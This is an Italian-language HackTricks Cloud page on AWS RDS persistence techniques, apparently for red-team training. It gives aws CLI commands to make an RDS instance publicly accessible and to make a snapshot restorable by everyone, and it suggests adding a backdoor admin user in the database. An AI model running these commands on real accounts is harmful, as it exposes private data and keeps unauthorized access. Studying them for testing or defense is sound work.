AWS - RDS Persistence

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository su github.

RDS

Per maggiori informazioni controlla:

AWS - Relational Database (RDS) Enum

Rendere l'istanza pubblicamente accessibile: `rds:ModifyDBInstance`

Un attaccante con questo permesso può modificare un'istanza RDS esistente per abilitare l'accessibilità pubblica.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Creare un utente admin all'interno del DB

Un attaccante potrebbe semplicemente creare un utente all'interno del DB così, anche se la password dell'utente master viene modificata, non perde l'accesso al database.

Rendere pubblica una snapshot

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository su github.

PreviousAWS - Lightsail Persistence NextAWS - S3 Persistence

Last updated 1 month ago

RDS

Rendere l'istanza pubblicamente accessibile: rds:ModifyDBInstance

Creare un utente admin all'interno del DB

Rendere pubblica una snapshot

Rendere l'istanza pubblicamente accessibile: `rds:ModifyDBInstance`